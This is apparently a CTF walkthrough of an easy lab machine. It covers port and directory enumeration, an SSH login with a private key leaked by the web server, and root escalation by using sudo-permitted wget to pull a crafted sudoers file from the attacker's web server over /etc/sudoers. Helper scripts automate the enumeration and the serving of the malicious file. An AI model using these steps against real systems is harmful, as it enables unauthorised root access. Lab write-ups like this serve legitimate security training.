This is a very easy machine: we get a foothold over SSH with a private key leaked by the web server, then escalate to root through a sudo misconfiguration to read the root flag.
So our very first step is to run an Nmap scan.
Command: nmap -T5 -p- -A <target IP>
(-T5 is the most aggressive timing template and can miss ports on a slow or lossy link; if the results look thin, rerun with -T4.)
In the results we found two open ports:
SSH (22) and HTTP (80).
I have filtered the nmap scan in this screenshot.
Now we will check port 80.
There is a default Apache web page.
If we check its source code, we can see something interesting:
a name, "Jessie". A name found like this is a candidate username, so note it down.
Now we will do Directory Busting with the help of gobuster.
Command: gobuster dir -u <target url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now we have found something interesting:
a directory called sitemap, which hosts a second website.
Now we will do directory busting on that directory as well.
Command: gobuster dir -u <target url>/sitemap -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now we have found a directory named .ssh.
Directory listing is enabled, so if we browse to it we can see an RSA private key, which we download.
We can use this key to log in to the machine over SSH; a private key exposed on a web server is as good as a password.
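The enumeration steps above (full-range nmap scan, then gobuster on the web root and on each directory it finds) as one script. This is an added example, not part of the original write-up; the target address, the output prefix, the wordlist path and the sample nmap line are assumptions or constructed inputs, and the recursion assumes gobuster v3 output where every hit line starts with the path.

```shell
#!/bin/sh
# Added example, not from the original write-up: the nmap and gobuster steps
# above as one script. The target address, output prefix and wordlist are
# assumptions; pass your own.

WORDLIST="${WORDLIST:-/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}"

# Constructed sample of an nmap grepable (-oG) host line, used by `demo`
# below so the parser can be exercised without scanning anything.
SAMPLE_GNMAP='Host: 10.10.10.10 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//Apache httpd 2.4.6/, 443/closed/tcp//https///  Ignored State: closed (65532)'

# Print the open TCP ports from a gnmap "Ports:" line as "22 80".
open_ports_from_gnmap() {
    printf '%s\n' "$1" \
        | grep -o '[0-9][0-9]*/open/tcp' \
        | cut -d/ -f1 \
        | tr '\n' ' ' \
        | sed 's/ $//'
}

# has_port <port> "<space separated list>": true if the port is in the list.
has_port() {
    case " $2 " in
        *" $1 "*) return 0 ;;
    esac
    return 1
}

# Full-range scan, then directory busting on the web root and, one level
# down, on every directory gobuster reports (assumes gobuster v3 output,
# where each hit line starts with the path).
enumerate() {   # enumerate <target ip> [output prefix]
    target=$1
    out=${2:-scan}
    nmap -T4 -p- -A -oA "$out" "$target" >/dev/null
    ports=$(open_ports_from_gnmap "$(grep 'Ports:' "$out.gnmap")")
    echo "open tcp ports: $ports"
    if has_port 80 "$ports"; then
        gobuster dir -q -u "http://$target" -w "$WORDLIST" -o "$out.dirs"
        grep -o '^/[^ ]*' "$out.dirs" | while read -r dir; do
            gobuster dir -q -u "http://$target$dir" -w "$WORDLIST" \
                -o "$out.dirs$(printf '%s' "$dir" | tr / _)"
        done
    fi
}

# Parse the constructed sample line; prints "22 80".
demo() {
    open_ports_from_gnmap "$SAMPLE_GNMAP"
}

case "$1" in
    scan) enumerate "$2" "$3" ;;
    demo) demo ;;
esac
```

Run it as `sh enum.sh scan <target IP>` for a real scan, or `sh enum.sh demo` to see the parser work on the constructed sample. Parsing the grepable output rather than eyeballing the screen is what lets the script decide on its own whether a web step is worth running.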
Earlier we found the name "Jessie".
Let's log in with this username and the RSA key.
First the key file must be readable only by its owner: ssh refuses a private key whose permissions are too open (the "UNPROTECTED PRIVATE KEY FILE" error). chmod 400 does exactly that (owner read only); it does not make the file executable, and it does not need to be.
Command: chmod 400 <file name>
Now we will log in over ssh.
Command: ssh -i <rsa file> jessie@<target IP>
We have successfully logged in to the machine.
The user flag is inside the "Documents" directory.
Now we will escalate our privileges to root so that we can get the root flag.
First, list the sudo privileges of the invoking user:
Command: sudo -l
The output shows that we can run "wget" as root without a password.
We will use this to escalate to root.
Because wget runs as root, it can write to any file on the target. We will craft a sudoers file on our machine, serve it over HTTP, and have the root wget overwrite /etc/sudoers with it so that jessie can run any command as root.
Create a file named sudoers containing exactly this one line:
jessie ALL=(ALL) NOPASSWD:ALL
Double-check the line before going further: a syntax error in /etc/sudoers breaks sudo for every user on the box, and without root there is no way to undo it. If visudo is installed locally, run visudo -c -f sudoers to validate the file first.
Now we will host this file with Python's built-in web server (port 80 needs root on our own machine; any high port works as long as the URL below is changed to match).
Command: python3 -m http.server 80
Now, on the target, we use the root wget to fetch the file straight over /etc/sudoers. Writing with -O onto the existing file keeps its root ownership and 0440 mode, which is why sudo still trusts it; a new file dropped into /etc/sudoers.d would typically be created 0644 and sudo would refuse to read it.
Command: sudo /usr/bin/wget http://<your IP>:80/sudoers -O /etc/sudoers
Now if we run
Command: sudo -l
again, the new rule shows up as (ALL) NOPASSWD: ALL, and
Command: sudo ls /root
lists the contents of /root. Finally,
Command: sudo cat /root/root_flag.txt
prints the root flag.
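The attacker side of the escalation above (write the sudoers rule, check it, serve it, and print the exact command to run on the target) as one script. This is an added example, not part of the original write-up; the username, attacker IP, port and the helper names are assumptions. The shape check is a deliberately strict fallback for machines without visudo: it only accepts a single rule of the form used here, which is enough to catch the typos that would leave the target with an unparsable /etc/sudoers.

```shell
#!/bin/sh
# Added example, not from the original write-up: attacker-side helper for the
# sudo+wget escalation. The username, the attacker IP and the server port
# are assumptions; pass your own.

# One sudoers rule that lets <user> run anything as root without a password.
sudoers_rule() {   # sudoers_rule <user>
    printf '%s ALL=(ALL) NOPASSWD:ALL\n' "$1"
}

# Strict shape check: exactly one non-blank line, matching the rule form above.
# This catches the typos (a missing parenthesis, a stray character) that would
# leave the target with an unparsable /etc/sudoers and no working sudo at all.
rule_file_looks_valid() {   # rule_file_looks_valid <file>
    grep -Eq '^[A-Za-z_][A-Za-z0-9_-]* ALL=\(ALL(:ALL)?\) NOPASSWD: *ALL$' "$1" \
        && [ "$(grep -cv '^[[:space:]]*$' "$1")" -eq 1 ]
}

# Prefer the real parser when visudo is installed locally; -c -f checks the
# given file without touching the local /etc/sudoers.
check_sudoers_file() {   # check_sudoers_file <file>
    if command -v visudo >/dev/null 2>&1; then
        visudo -c -f "$1" 2>/dev/null | grep -q 'parsed OK'
    else
        rule_file_looks_valid "$1"
    fi
}

# Write, check and serve the file, and print the commands to run on the target.
serve_sudoers() {   # serve_sudoers <user> <attacker ip> [port]
    user=$1; ip=$2; port=${3:-80}
    dir=$(mktemp -d)
    sudoers_rule "$user" > "$dir/sudoers"
    if ! check_sudoers_file "$dir/sudoers"; then
        echo "refusing to serve a malformed sudoers file" >&2
        return 1
    fi
    cat <<EOF
Serving $dir/sudoers on port $port. On the target, as $user, run:
  sudo /usr/bin/wget http://$ip:$port/sudoers -O /etc/sudoers
  sudo -l            # should now show (ALL) NOPASSWD: ALL
  sudo cat /root/root_flag.txt
EOF
    # -O onto the existing /etc/sudoers keeps its root-owned 0440 mode, which
    # is why sudo still trusts it; a newly created file would be 0644 and
    # sudo would refuse to read it.
    (cd "$dir" && python3 -m http.server "$port")
}

case "$1" in
    serve) serve_sudoers "$2" "$3" "$4" ;;
esac
```

Run it as `sudo sh serve_sudoers.sh serve jessie <your IP>` (port 80 needs root locally) or `sh serve_sudoers.sh serve jessie <your IP> 8000` for a high port. The check before serving is the part worth keeping: overwriting /etc/sudoers is a one-shot operation, and a malformed file locks everyone, including you, out of sudo on the target.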